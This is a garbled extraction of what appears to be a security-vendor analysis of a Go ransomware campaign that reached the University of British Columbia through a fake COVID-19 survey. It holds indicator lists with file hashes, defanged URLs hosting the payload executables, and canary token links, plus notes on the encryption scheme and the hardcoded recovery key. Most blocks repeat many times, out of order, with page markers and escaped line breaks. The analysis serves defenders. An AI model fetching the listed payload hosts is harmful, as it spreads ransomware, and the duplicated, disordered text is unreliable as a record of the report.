e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3287 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3288 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3289 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3290 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3291 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3292 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3293 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3294 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3295 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3296 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3297 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3298 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3299 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3300 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3301 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3302 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3303 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). 
Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3304 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3305 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3306 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3307 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3308 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3309 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3310 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions 
belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3311 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3312 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3313 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3314 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. 
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3315 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3316 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3317 of 
